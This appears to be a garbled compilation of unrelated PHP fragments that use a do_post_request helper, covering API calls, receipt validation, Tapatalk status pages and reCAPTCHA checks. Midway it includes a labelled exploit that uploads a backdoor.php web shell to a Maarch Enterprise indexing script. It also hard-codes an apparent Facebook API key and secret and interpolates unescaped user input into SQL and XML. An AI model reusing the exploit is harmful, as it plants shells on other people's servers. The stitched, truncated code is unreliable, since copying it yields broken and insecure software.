public function generateToken($pid, $username, $terminalType)
{
$APIversion = "0.1";
$authType_Token = 0;
$appAccountID_Token = $pid . "-" . $username;
$userTerminalType_Token = $terminalType;
$userTerminalSN_Token = time();
$grantedCapabilityID_Token = "100<200<301<302<303<400";
$callbackURL_Token = "www.baidu.com";
$url_Token = "http://" . $this->restServer . "/RTC/ws/" . $APIversion . "/ApplicationID/" . $this->appid . "/CapabilityToken";
$headers = "Content-Type: application/json\r\n";
$headers .= "authorization: RTCAUTH,realm=AppServer,ApplicationId=" . $this->appid . ",APP_Key=" . $this->appkey;
$postData_Token_arr['authType'] = $authType_Token;
$postData_Token_arr['appAccountID'] = $appAccountID_Token;
$postData_Token_arr['userTerminalType'] = $userTerminalType_Token;
$postData_Token_arr['userTerminalSN'] = $userTerminalSN_Token;
$postData_Token_arr['grantedCapabiltyID'] = $grantedCapabilityID_Token;
$postData_Token_arr['callbackURL'] = $callbackURL_Token;
$postData_Token_json = json_encode($postData_Token_arr);
$header_Servers = array('http' => array('header' => $headers, 'timeout' => 6));
$result_Token = do_post_request($url_Token, $postData_Token_json, $headers);
$token_obj = json_decode($result_Token);
$web_sip_password = $token_obj->capabilityToken;
$token_back = $web_sip_password . "|" . $username . "|" . $pid . "|" . $this->appid . "|" . $userTerminalSN_Token . "|" . $userTerminalType_Token;
//echo $token_back;
$base64_token_back = base64_encode($token_back);
return $base64_token_back;
}
function UpdateGoogleKey($server, $username, $password, $database)
{
global $gLoginKeyAttempts;
global $gServerKey;
try {
$email = "<YOUR_EMAIL>";
$password = "******";
if ($gLoginKeyAttempts <= 3) {
$gServerKey = do_post_request("https://www.google.com/accounts/ClientLogin", "accountType=HOSTED_OR_GOOGLE&Email={$email}&Passwd={$password}&service=ac2dm&source=teleknEsis-C2DMSample-1.0");
if ($gServerKey && strlen($gServerKey) > 0) {
$startIndex = strpos($gServerKey, "Auth=");
$gServerKey = substr($gServerKey, $startIndex + 5);
// Now I save the server key to a MySQL db
$mysqli = new mysqli($server, $username, $password, $database);
$result = $mysqli->query("CALL UpdateGoogleLoginKey( '{$gServerKey}' )");
} else {
// retry
$gLoginKeyAttempts += 1;
UpdateGoogleKey($server, $username, $password, $database);
}
} else {
echo "ERROR UPDATING GOOGLE LOGIN KEY";
}
} catch (Exception $error) {
echo "UpdateGoogleKey: " . $error->getMessage() . "\n";
}
}
/**
* Sends an API request to Facebook
*
* @param array $parameters Array of parameters to send
* @param string $method The API function to call
* @return array Returns array of data returned
*/
function do_facebook_request($parameters, $method)
{
if (empty($parameters) || empty($method)) {
return false;
}
// Build Facebook args
// http://developers.f8.facebook.com/documentation.php?v=1.0&doc=auth
$data['api_key'] = 'API KEY';
$data['method'] = $method;
$data['v'] = '1.0';
// Loop through and set as array
foreach ($parameters as $key => $value) {
$data[$key] = $value;
}
// Sort
ksort($data);
$args = '';
foreach ($data as $key => $value) {
$args .= $key . '=' . $value;
}
$data['sig'] = md5($args . 'secret');
// Get a Facebook session
$response = do_post_request('http://api.facebook.com/restserver.php', $data);
// Handle XML [23]
$xml = simplexml_load_string($response);
return $xml;
}
/**
* Sends an API request to Facebook
*
* @param array $parameters Array of parameters to send
* @param string $method The API function to call
* @return array Returns array of data returned
*/
function do_facebook_request($parameters, $method)
{
if (empty($parameters) || empty($method)) {
return false;
}
// Build Facebook args
// http://developers.f8.facebook.com/documentation.php?v=1.0&doc=auth
$data['api_key'] = 'a4fe481e90134c25d517872e0a67e3ce';
$data['method'] = $method;
$data['v'] = '1.0';
// Loop through and set as array
foreach ($parameters as $key => $value) {
$data[$key] = $value;
}
// Sort
ksort($data);
$args = '';
foreach ($data as $key => $value) {
$args .= $key . '=' . $value;
}
$data['sig'] = md5($args . 'e7452cf6aa4b5b039a25cd7b037676e9');
// Get a Facebook session
$response = do_post_request('http://api.facebook.com/restserver.php', $data);
//echo $response;
// Handle XML
$xml = simplexml_load_string($response);
print_r($xml);
//return $xml;
}
function translate($item, $from, $to)
{
$url = str_replace(" ", "%20", "http://ajax.googleapis.com/ajax/services/language/translate?v=1.0&q=" . $item . "&langpair=" . $from . "%7C" . $to);
$result = do_post_request($url);
// now, process the JSON string
return json_decode($result)->{'responseData'}->{'translatedText'};
// now have some fun with the results...
}
function buildImage($ditaa)
{
$args = array();
$args['ditaa'] = $ditaa;
$args['no-antialias'] = $this->antialias ? 0 : 1;
$args['no-shadows'] = $this->shadows ? 0 : 1;
$args['scale'] = $this->scale;
$args['round-corners'] = $this->round_corners ? 1 : 0;
$args['no-separations'] = $this->separations ? 0 : 1;
return do_post_request($this->url, $args);
}
function validateReceipt($receiptdata, $devmode = FALSE)
{
if ($devmode) {
$appleURL = "https://sandbox.itunes.apple.com/verifyReceipt";
} else {
$appleURL = "https://buy.itunes.apple.com/verifyReceipt";
}
$receipt = json_encode(array("receipt-data" => $receiptdata));
$response_json = do_post_request($appleURL, $receipt);
$response = json_decode($response_json);
return $response;
}
function validateReceiptAbonnement($hex, $testing = 1)
{
$password = "******";
if ($testing == 1) {
$url = 'https://sandbox.itunes.apple.com/verifyReceipt';
} else {
$url = 'https://buy.itunes.apple.com/verifyReceipt';
}
$postData = json_encode(array('receipt-data' => $hex, 'password' => $password));
$response_json = do_post_request($url, $postData);
$response = json_decode($response_json);
return $response;
}
function check()
{
global $error;
global $CONST;
if (isset($_POST["usernamesignup"]) && isset($_POST["anweshasignup"]) && isset($_POST["passwordsignup"]) && isset($_POST['6_letters_code'])) {
} else {
$error["msg"] = 'Incomplete request';
$error['component'] = 'username';
return;
}
$user = $_POST["usernamesignup"];
$anw = $_POST["anweshasignup"];
$pass = $_POST["passwordsignup"];
/**
* validating captcha
*/
if (empty($_SESSION['6_letters_code']) || $_SESSION['6_letters_code'] != $_POST['6_letters_code']) {
$error["msg"] = "The captcha code does not match!";
$error["component"] = "captcha";
return;
}
/**
* getting the status of login in anwesha website
*/
$url = 'http://2016.anwesha.info/login/';
$data = array('username' => $anw, 'password' => $pass);
$data = http_build_query($data);
$reply = do_post_request($url, $data);
$res = (array) json_decode($reply);
/**
* getting the login status
*/
if (!$res['status']) {
$error["msg"] = "Authentication failed. You entered an incorrect Anwesha ID or password.";
$error["component"] = "anwesha";
return;
}
$hash = sha1($pass);
if (!checkUsername($user)) {
$error["msg"] = "Username already taken.";
$error["component"] = "username";
return;
}
if (!filter_var($user, FILTER_VALIDATE_REGEXP, array("options" => array('regexp' => '/^[\\w]{5,15}$/')))) {
$error["msg"] = "Inappropriate username (5 to 15 alphanumeric characters needed)";
$error["component"] = "username";
return;
}
// var_dump($CONT);
}
function ticket_post($name, $email, $topicId, $subject, $message, $ticket_type_id = '')
{
global $ticket_post_url;
$pri = "2";
$dept_id = "1";
$fields = array('name' => urlencode($name), 'email' => urlencode($email), 'topicId' => urlencode($topicId), 'subject' => urlencode($subject), 'tickettype' => urlencode($ticket_type_id), 'dept_id' => urlencode($dept_id), 'pri' => urlencode($pri), 'message' => urlencode($message));
$fields_string = '';
$response = '';
foreach ($fields as $key => $value) {
$fields_string .= $key . '=' . $value . '&';
}
rtrim($fields_string, '&');
try {
$response = do_post_request($ticket_post_url, $fields_string);
} catch (Exception $e) {
}
return $response;
}
function getsListPhone()
{
$ip = "";
$Signature = md5(API_TOKEN);
$url = $this->api_url . "/api/getsListPhone";
$data = array('API_TOKEN' => API_TOKEN, 'Signature' => $Signature, 'Ip' => $ip);
$response = do_post_request($url, $data);
switch ($response) {
case '-110':
$result['code'] = $response;
$result['msg'] = 'Mã bảo mật không chính xác';
case '-111':
$result['code'] = $response;
$result['msg'] = 'Chữ ký điện tử không hợp lệ';
default:
$result['code'] = $response;
$result['msg'] = '';
}
return $result;
}
function immediate_update_outcome_in_canvas($oauth_consumer_key, $secret, $lti_sourced_id, $lis_outcome_service_url, $score)
{
set_time_limit(180);
$xmlRequest = "<?xml version = \"1.0\" encoding = \"UTF-8\"?>\n<imsx_POXEnvelopeRequest xmlns=\"http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0\">\n <imsx_POXHeader>\n <imsx_POXRequestHeaderInfo>\n <imsx_version>V1.0</imsx_version>\n <imsx_messageIdentifier>999999123</imsx_messageIdentifier>\n </imsx_POXRequestHeaderInfo>\n </imsx_POXHeader>\n <imsx_POXBody>\n <replaceResultRequest>\n <resultRecord>\n <sourcedGUID>\n <sourcedId>{$lti_sourced_id}</sourcedId>\n </sourcedGUID>\n <result>\n <resultScore>\n <language>en</language>\n <textString>" . $score . "</textString>\n </resultScore>\n </result>\n </resultRecord>\n </replaceResultRequest>\n </imsx_POXBody>\n</imsx_POXEnvelopeRequest>";
$hash = base64_encode(sha1($xmlRequest, TRUE));
$params = array('oauth_body_hash' => $hash);
$hmac_method = new OAuthSignatureMethod_HMAC_SHA1();
$consumer = new OAuthConsumer($oauth_consumer_key, $secret, NULL);
$req = OAuthRequest::from_consumer_and_token($consumer, NULL, 'POST', $lis_outcome_service_url, $params);
$req->sign_request($hmac_method, $consumer, NULL);
$params = $req->get_parameters();
$header = $req->to_header();
$header .= "\nContent-type: application/xml";
$ext_response = do_post_request($lis_outcome_service_url, $xmlRequest, $header);
$ext_doc = new DOMDocument();
set_error_handler(array($this, 'HandleXmlError'));
$ext_doc->loadXML($ext_response);
restore_error_handler();
$ext_nodes = domnode_to_array($ext_doc->documentElement);
if (!isset($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_codeMajor'])) {
throw new Exception("No imsx_codeMajor from outcome service for " . $lti_sourced_id);
}
if ($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_codeMajor'] != 'success' && isset($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_description']) && $ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_description'] != 'User is no longer in course') {
throw new Exception("No success code from outcome service for " . $lti_sourced_id);
}
}
function tsv_sms_enviar($telefono, $mensaje, $firma)
{
$datos = array('telefono' => $telefono, 'mensaje' => $mensaje, 'firma' => $firma, 'enviar' => '¡Enviar Mensaje!');
return do_post_request('http://sms.todosv.com/index.php?visual=estado', http_build_query($datos));
}
define('IN_MOBIQUO', 1);
if (isset($_GET['allowAccess'])) {
echo "yes";
exit;
}
if (isset($_GET['checkip'])) {
print do_post_request(array('ip' => 1), true);
} else {
$output = 'Tapatalk Push Notification Status Monitor<br><br>';
$output .= 'Push notification test: <b>';
require_once dirname(dirname(__FILE__)) . '/SSI.php';
global $modSettings, $smcFunc;
if (isset($modSettings['tp_push_key']) && !empty($modSettings['tp_push_key'])) {
$push_key = $modSettings['tp_push_key'];
$return_status = do_post_request(array('test' => 1, 'key' => $push_key), true);
if ($return_status === '1') {
$output .= 'Success</b>';
} else {
$output .= 'Failed</b><br />' . $return_status;
}
} else {
$output .= 'Failed</b><br />Please set Tapatalk API Key at forum option/setting<br />';
}
//$ip = do_post_request(array('ip' => 1), true);
$forum_url = get_forum_path();
$table_exist = mobi_table_exist('tapatalk_users') ? 'Yes' : 'No';
$output .= "<br>Current forum url: " . $forum_url . "<br>";
//$output .="Current server IP: ".$ip."<br>";
$output .= "Tapatalk user table existence:" . $table_exist . "<br>";
if (isset($modSettings['push_slug'])) {
Exploit code :
<?php
/* EXPLOIT URL */
$target_url = "http://website.target/apps/maarch_enterprise/";
/* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */
$indexing_path = "indexing_searching/";
/* TARGET UPLOAD FILE */
$target_file = "file_to_index.php";
/* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
$file = "backdoor.php";
/* NAME, EMPTY WITH LETTERBOX */
$name = "shell";
/* LAUNCHING EXPLOIT */
do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);
function do_post_request($url, $res, $file, $name)
{
$data = "";
$boundary = "---------------------" . substr(md5(rand(0, 32000)), 0, 10);
$data .= "--{$boundary}\n";
$fileContents = file_get_contents($file);
$md5 = md5_file($file);
$ext = pathinfo($file, PATHINFO_EXTENSION);
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
$data .= "Content-Type: text/plain\n";
$data .= "Content-Transfer-Encoding: binary\n\n";
$data .= $fileContents . "\n";
$data .= "--{$boundary}--\n";
$params = array('http' => array('method' => 'POST', 'header' => 'Content-Type: multipart/form-data; boundary=' . $boundary, 'content' => $data));
$ctx = stream_context_create($params);
function getUserCardLog($username)
{
// define value
$wsUserName = $this->wsUsername;
$wsPassword = $this->wsPassword;
$ip = "";
$Signature = md5($username . $wsUserName . $wsPassword);
$url = $this->base_url . "api/api/getUserCardLog";
$data = array('UserName' => $username, 'wsUserName' => $wsUserName, 'wsPassword' => $wsPassword, 'Signature' => $Signature, 'Ip' => $ip);
$checkLoginResult = do_post_request($url, $data);
// ignore ssl
switch ($checkLoginResult) {
case '-888':
$result['code'] = $checkLoginResult;
$result['msg'] = "Tài khoản hoặc mật khẩu không đúng.";
//'Lỗi hệ thống.';
break;
case '-110':
$result['code'] = $checkLoginResult;
$result['msg'] = 'Tham số của hàm không hợp lệ.';
break;
case '-102':
$result['code'] = $checkLoginResult;
$result['msg'] = 'Chữ ký điện tử không hợp lệ.';
break;
case '-101':
$result['code'] = $checkLoginResult;
$result['msg'] = 'Ip bị cấm truy cập WebService.';
break;
case '-100':
$result['code'] = $checkLoginResult;
$result['msg'] = 'Tài khoản WebService không tồn tại.';
break;
case '-1':
$result['code'] = $checkLoginResult;
$result['msg'] = 'Tài khoản hoặc mật khẩu không đúng.';
break;
default:
$result['code'] = 1;
$result['msg'] = $checkLoginResult;
}
//print_r($result);exit;
return $result;
}
$destinationCode = @strtoupper($_GET["destinationCode"]);
$gatewayCode = @strtoupper($_GET["gatewayCode"]);
$roomId = @$_GET["roomId"];
$firstname = @$_GET["firstname"];
$lastname = @$_GET["lastname"];
$txtLeave = @$_GET["txtLeave"];
$txtReturn = @$_GET["txtReturn"];
//Non essential for booking but needed for posting to DB and sending confirmation email
$email = @$_GET["email"];
$phone = @$_GET["phone"];
$roomDesc = @$_GET["roomDesc"];
$hotelName = @$_GET["hotelName"];
$quotedPrice = @$_GET["price"];
$commentBox = @$_GET["commentBox"];
$bookingXml = "XMLfile=<BookTripRequest>\n <SessionID>TestingForm</SessionID>\n <TourOperatorCode>TIM</TourOperatorCode>\n <AgencyCode>21754246</AgencyCode>\n <ClientType></ClientType>\n <ReturnItemList>Y</ReturnItemList>\n <WantInsurance>N</WantInsurance>\n <RoomPaxLists>\n <TotalPassengerCount>2</TotalPassengerCount>\n <PassengerList>\n <PassengerCount>2</PassengerCount>\n <Passenger>\n <PassengerFirstName>{$firstname}</PassengerFirstName>\n <PassengerLastName>{$lastname}</PassengerLastName>\n </Passenger>\n <Passenger>\n <PassengerFirstName>Placeholder</PassengerFirstName>\n <PassengerLastName>{$lastname}</PassengerLastName>\n </Passenger>\n <ChildList>\n <ChildCount>0</ChildCount>\n </ChildList>\n </PassengerList>\n </RoomPaxLists>\n \n <GatewayCode>{$gatewayCode}</GatewayCode>\n <DestinationCode>{$destinationCode}</DestinationCode>\n <DepartureDate>{$txtLeave}</DepartureDate>\n <ReturnDate>{$txtReturn}</ReturnDate>\n \n <HotelRequest>\n <RoomID>{$roomId}</RoomID>\n <NumberOfRooms>1</NumberOfRooms>\n </HotelRequest>\n \n</BookTripRequest>";
$xmlResponse = do_post_request(BOOKING_URL, $bookingXml);
if (!empty($xmlResponse)) {
if (@(!($sxe = simplexml_load_string($xmlResponse)))) {
error_log("Error while parsing search xml for gatewayCode {$gatewayCode} and destinationCode {$destinationCode}", 0);
}
if (!($dom = dom_import_simplexml($sxe))) {
error_log("Error while parsing search xml, second level, for gatewayCode {$gatewayCode} and destinationCode {$destinationCode}", 0);
}
$exceptionResponse = $dom->getElementsByTagName('ExceptionText');
if ($exceptionResponse->length > 0) {
error_log("Error while booking gatewayCode {$gatewayCode} and destinationCode {$destinationCode}, leaving {$txtLeave} and returning {$txtReturn}", 0);
} else {
$bookingNumber = $dom->getElementsByTagName('BookingNo')->item(0)->nodeValue;
if (!empty($email)) {
sendConfirmationEmail($bookingNumber, $email, $hotelName, $roomDesc, $txtLeave, $txtReturn, $quotedPrice, $firstname . " " . $lastname, $phone, $commentBox);
}
<?php
error_log("someone posted to the test_comment.php file");
//error_log("post body was");
//error_log(print_r($HTTP_RAW_POST_DATA,TRUE));
function do_post_request($url, $xml_req, $optional_headers = null)
{
$ses = curl_init("http://giswebservices.massgis.state.ma.us/geoserver/wfs");
if ($ses === FALSE) {
error_log("error connecting");
error_log(print_r(curl_getinfo($ses), TRUE));
return "";
}
curl_setopt($ses, CURLOPT_POST, TRUE);
$headers = array('Content-type:text/xml', 'Content-Length:' . strlen($xml_req), 'Expect:');
curl_setopt($ses, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ses, CURLOPT_POSTFIELDS, $xml_req);
curl_setopt($ses, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ses, CURLOPT_FAILONERROR, TRUE);
$ret = curl_exec($ses);
if ($ret === FALSE) {
error_log(curl_error($ses));
return "";
}
error_log("got response " . $ret);
return $ret;
}
$url = "http://giswebservices.massgis.state.ma.us/geoserver/wfs";
$xml_req = $HTTP_RAW_POST_DATA;
echo do_post_request($url, $xml_req);
exit;
}
if (isset($_GET['checkip'])) {
print do_post_request(array('ip' => 1), true);
} else {
// print_r($GLOBALS);
$output = 'Tapatalk Push Notification Status Monitor<br><br>';
$output .= 'Push notification test: <b>';
require_once dirname(dirname(__FILE__)) . '/SSI.php';
$return_status = do_post_request(array('test' => 1, 'url' => $boardurl), true);
if ($return_status === '1') {
$output .= 'Success</b>';
} else {
$output .= 'Failed</b><br />' . $return_status;
}
$ip = do_post_request(array('ip' => 1), true);
$table_exist = mobi_table_exist('tapatalk_users') ? 'Yes' : 'No';
$output .= "<br>Current forum url: " . $boardurl . "<br>";
$output .= "Current server IP: " . $ip . "<br>";
$output .= "Tapatalk user table existence:" . $table_exist . "<br>";
if (isset($modSettings['push_slug'])) {
$push_slug = unserialize(base64_decode($modSettings['push_slug']));
if (!empty($push_slug) && is_array($push_slug)) {
$output .= 'Push Slug Status : ' . ($push_slug['stick'] == 1 ? 'Stick' : 'Free') . '<br />';
}
if (isset($_GET['slug'])) {
$output .= 'Push Slug Value: ' . $modSettings['push_slug'] . "<br /><br />";
}
}
$output .= "<br>\n<a href=\"https://tapatalk.com/api.php\" target=\"_blank\">Tapatalk API for Universal Forum Access</a><br>\nFor more details, please visit <a href=\"https://tapatalk.com\" target=\"_blank\">https://tapatalk.com</a>";
echo $output;
if ($do == 2) {
$ip = (isset($_POST['ip_address']) and !empty($_POST['ip_address'])) ? $_POST['ip_address'] : ((isset($_GET['ip_address']) and !empty($_GET['ip_address'])) ? $_GET['ip_address'] : i2c_realip());
$post_data = array();
$post_data['ip_address'] = $ip;
if (function_exists('curl_init') and $ch = curl_init()) {
curl_setopt($ch, CURLOPT_URL, 'http://ip-to-country.webhosting.info/node/view/36');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if (curl_errno($ch)) {
exit(curl_error($ch));
}
curl_close($ch);
} else {
$postResult = do_post_request('http://ip-to-country.webhosting.info/node/view/36', 'ip_address=' . $ip);
}
begin_frame('Search Result');
if (empty($errormessage)) {
$regex = '' . '#<b>' . $ip . '</b>(.*).<br><br><img src=(.*)>#U';
preg_match_all($regex, $postResult, $result, PREG_SET_ORDER);
echo '<tr><td align=center>IP Address <b>' . htmlspecialchars($ip) . '</b>' . $result[0][1] . '.<br><br><img src="http://ip-to-country.webhosting.info/' . $result[0][2] . '"></td></tr>';
} else {
echo '<tr><td>' . $errormessage . '</td></tr>';
}
end_frame();
echo '<br>';
}
begin_frame('Ip to Country');
echo '
<tr><td align=center>
<?php
include "../../settings/config.php";
include "../../settings/databaseinfo.php";
include "../../settings/json.php";
include "../../settings/mysql.php";
include "../../languages/translator.php";
include "../../templates/templates.php";
$DbLink = new DB();
if ($_GET[name]) {
$userName = $_GET['name'];
$found = array();
$found[0] = json_encode(array('Method' => 'GetProfile', 'WebPassword' => md5(WEBUI_PASSWORD), 'Name' => cleanQuery($_GET['name'])));
$do_post_requested = do_post_request($found);
$recieved = json_decode($do_post_requested);
$profileTXT = $recieved->{'profile'}->{'AboutText'};
$profileImage = $recieved->{'profile'}->{'Image'};
$created = $recieved->{'account'}->{'Created'};
$UUID = $recieved->{'account'}->{'PrincipalID'};
$diff = $recieved->{'account'}->{'TimeSinceCreated'};
$type = $recieved->{'account'}->{'AccountInfo'};
$partner = $recieved->{'account'}->{'Partner'};
$date = date("D d M Y - g:i A", $created);
}
$DbLink->query("SELECT id,\n displayTopPanelSlider, \n displayTemplateSelector,\n displayStyleSwitcher,\n displayStyleSizer,\n displayFontSizer,\n displayLanguageSelector,\n displayScrollingText,\n displayWelcomeMessage,\n displayLogo,\n displayLogoEffect,\n displaySlideShow,\n displayMegaMenu,\n displayDate,\n displayTime,\n displayRoundedCorner,\n displayBackgroundColorAnimation,\n displayPageLoadTime,\n displayW3c,\n displayRss FROM " . C_ADMINMODULES_TBL . " ");
list($id, $displayTopPanelSlider, $displayTemplateSelector, $displayStyleSwitcher, $displayStyleSizer, $displayFontSizer, $displayLanguageSelector, $displayScrollingText, $displayWelcomeMessage, $displayLogo, $displayLogoEffect, $displaySlideShow, $displayMegaMenu, $displayDate, $displayTime, $displayRoundedCorner, $displayBackgroundColorAnimation, $displayPageLoadTime, $displayW3c, $displayRss) = $DbLink->next_record();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
$createform .= "<div class='alert alert-warning text-center'>Warning: This form is insecure.</div>";
}
if ($_REQUEST['s'] == 'next') {
$email_preg = "/[a-z0-9!#\$%&'*+=?^_`{|}~-]+(?:\\.[a-z0-9!#\$%&'*+=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+(?:[a-z]{2}|com|org|net|edu|gov|mil|biz|info|mobi|name|aero|asia|jobs|museum)\\b/";
if (!empty($_POST['honey'])) {
$login_ouptut .= "<div class='alert alert-warning'><button type='button' class='close' data-dismiss='alert' aria-label='Close'><span aria-hidden='true'>×</span></button><p><strong>Whoops!</strong> You tripped one of our bot tests. If you are not a bot, please go back and try again. Read your fields carefully!</p></div>";
$_POST['email'] = 'bob';
}
# https://developers.google.com/recaptcha/docs/verify
$recaptcha_uri = "https://www.google.com/recaptcha/api/siteverify";
$recaptcha_params = array("secret" => $recaptcha_private_key, "response" => $_POST["g-recaptcha-response"], "remoteip" => $_SERVER["REMOTE_ADDR"]);
try {
if ($debug) {
$login_output .= "<pre>Querying reCAPTCHA: " . displayDebug($recaptcha_params) . "\n to {$recaptcha_uri}</pre>";
}
$bareResponse = do_post_request($recaptcha_uri, $recaptcha_params);
if ($debug) {
$login_output .= "<pre>Bare output: " . displayDebug($bareResponse) . "</pre>";
}
$resp = json_decode($bareResponse, true);
if (empty($bareResponse) || $bareResponse === false) {
throw new Exception("Bad Response");
}
if ($debug) {
$login_output .= "<pre>Parsed output: " . displayDebug($resp) . "</pre>";
}
} catch (Exception $e) {
$resp["success"] = false;
$resp["post-error"] = $e->getMessage();
$resp["full_error"] = $e;
$resp["login_caught_error"] = true;
//echo "beg loop<br/>"; die();
//echo date('c').' - '.$i.' - '."\"".$user['name']."\" <".$user['email']."> - Inviting to ".$slackHostName." Slack\n\n";
//echo "user array:";
//printArray($user);
$fields = array('email' => $user['email'], 'first_name' => urlencode($user['first_name']), 'last_name' => urlencode($user['last_name']), 'channels' => urlencode($slackAutoJoinChannels), 'token' => urlencode($slackAuthToken), 'set_active' => urlencode('true'), '_attempts' => '1');
//echo "fields array:";
//printArray($fields);
// url-ify the data for the POST
$fields_string = '';
foreach ($fields as $key => $value) {
$fields_string .= $key . '=' . $value . '&';
}
rtrim($fields_string, '&');
$slackInviteUrl .= $fields_string;
//echo $slackInviteUrl;
$replyRaw = do_post_request($slackInviteUrl, null, null);
$reply = json_decode($replyRaw, true);
if ($reply['ok'] == false) {
$error .= " Slack error: " . $reply['error'] . " ";
header("Location: slack.php?success=0&erros={$error}");
//echo date('c') . " - " . $user['first_name'] . " " . $user['last_name'] . " - " . $user['email'] . " - " . "Error: " . $reply['error'] . "<br/>";
} else {
//echo date('c') . " - " . $user['first_name'] . " " . $user['last_name'] . " - " . $user['email'] . " - " . "Invited successfully" . "<br/>";
}
array_push($previouslyInvitedEmails, $user);
//echo "end loop<br/>";
} else {
//echo "already in array<br/>";
$error .= " Email was already used to sign up (check your email for an invitation from Slack). ";
//echo $error; die();
header("Location: slack.php?success=0&error={$error}");
}
} else {
if (isset($_COOKIE['SESSIONID'])) {
echo do_get_request(rtrim($server, "/") . $resource, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']);
} else {
echo do_get_request(rtrim($server, "/") . $resource);
}
}
} else {
$parts = explode("?", $_SERVER['REQUEST_URI']);
if (count($parts) > 1) {
$parts = explode("&", base64_decode($parts[1]));
if (count($parts) == 2) {
// in case we're continuing stage negotiation
$uri = $server . $parts[1] . "?" . base64_encode($parts[0]);
$postdata = file_get_contents("php://input");
if (isset($_COOKIE['SESSIONID'])) {
echo do_post_request($uri, $postdata, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']);
} else {
echo do_post_request($uri, $postdata);
}
}
} else {
$postdata = file_get_contents("php://input");
if (isset($_COOKIE['SESSIONID'])) {
echo do_post_request(rtrim($server, "/") . $resource, $postdata, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']);
} else {
echo do_post_request(rtrim($server, "/") . $resource, $postdata);
}
}
}
}
$data .= "--" . $boundary . "\n";
if (is_array($files)) {
foreach ($files as $key => $file) {
$fileContents = file_get_contents($file['tmp_name']);
$data .= "Content-Disposition: form-data; name=" . $key . "; filename=" . $file['name'] . "\n";
$data .= "Content-Type: application/x-bittorrent\n";
$data .= "Content-Transfer-Encoding: binary\n\n";
$data .= $fileContents . "\n";
$data .= "--" . $boundary . "--\n";
}
}
$params = array('http' => array('method' => 'POST', 'header' => 'Content-Type: multipart/form-data; boundary=' . $boundary, 'content' => $data));
$ctx = stream_context_create($params);
$fp = @fopen($url, 'rb', false, $ctx);
if (!$fp) {
throw new Exception("Problem with " . $url . ", " . $php_errormsg);
}
$response = @stream_get_contents($fp);
if ($response === false) {
throw new Exception("Problem reading data from " . $url . ", " . $php_errormsg);
}
return $response;
}
if (count($_POST)) {
$post = $_POST;
}
$post['submit'] = "Upload";
$files['torrent_file'] = $_FILES['torrent_file'];
print_r(do_post_request($api, $post, $files));
}
return $ids;
}
if (ZM_OPT_USE_AUTH && ZM_AUTH_HASH_LOGINS && empty($user) && !empty($_REQUEST['auth'])) {
if ($authUser = getAuthUser($_REQUEST['auth'])) {
userLogin($authUser['Username'], $authUser['Password'], true);
}
}
if (!empty($action)) {
if ($action == "login" && isset($_REQUEST['username']) && (ZM_AUTH_TYPE == "remote" || isset($_REQUEST['password']))) {
// if true, a popup will display after login
// PP - lets validate reCaptcha if it exists
if (defined('ZM_OPT_USE_GOOG_RECAPTCHA') && defined('ZM_OPT_GOOG_RECAPTCHA_SECRETKEY') && defined('ZM_OPT_GOOG_RECAPTCHA_SITEKEY') && ZM_OPT_USE_GOOG_RECAPTCHA && ZM_OPT_GOOG_RECAPTCHA_SECRETKEY && ZM_OPT_GOOG_RECAPTCHA_SITEKEY) {
$url = 'https://www.google.com/recaptcha/api/siteverify';
$fields = array('secret' => ZM_OPT_GOOG_RECAPTCHA_SECRETKEY, 'response' => $_REQUEST['g-recaptcha-response'], 'remoteip' => $_SERVER['REMOTE_ADDR']);
$res = do_post_request($url, http_build_query($fields));
$responseData = json_decode($res, true);
// PP - credit: https://github.com/google/recaptcha/blob/master/src/ReCaptcha/Response.php
// if recaptcha resulted in error, we might have to deny login
if (isset($responseData['success']) && $responseData['success'] == false) {
// PP - before we deny auth, let's make sure the error was not 'invalid secret'
// because that means the user did not configure the secret key correctly
// in this case, we prefer to let him login in and display a message to correct
// the key. Unfortunately, there is no way to check for invalid site key in code
// as it produces the same error as when you don't answer a recaptcha
if (isset($responseData['error-codes']) && is_array($responseData['error-codes'])) {
if (!in_array('invalid-input-secret', $responseData['error-codes'])) {
Error("reCaptcha authentication failed");
userLogout();
$view = 'login';
$refreshParent = true;
<?php
if (!empty($_POST)) {
$url = "http://localhost/url/shorten.php";
$xmlcontent = "<?xml version='1.0'?><data><user><username>" . $_POST['username'] . "</username><password>" . $_POST['password'] . "</password></user><url><long>" . $_POST['url'] . "</long></url></data>";
$data = do_post_request($url, $xmlcontent);
print_r($data);
if ($data->status == 1) {
echo "<h1>Your short url: <a href='http://localhost/url/" . $data->url->short . "'>http://localhost/url/" . $data->url->short . "</a></h1>";
} else {
echo "<h1>Error: " . $data->error . "</h1>";
}
}
function do_post_request($url, $data, $optional_headers = null)
{
$params = array('http' => array('method' => 'POST', 'content' => $data));
if ($optional_headers !== null) {
$params['http']['header'] = $optional_headers;
}
$ctx = stream_context_create($params);
$fp = @fopen($url, 'rb', false, $ctx);
if (!$fp) {
throw new Exception("Problem with {$url}, {$php_errormsg}");
}
$response = @stream_get_contents($fp);
if ($response === false) {
throw new Exception("Problem reading data from {$url}, {$php_errormsg}");
}
return simplexml_load_string($response);
}
/**
* stathat_ez_value_sync function.
*
* @access public
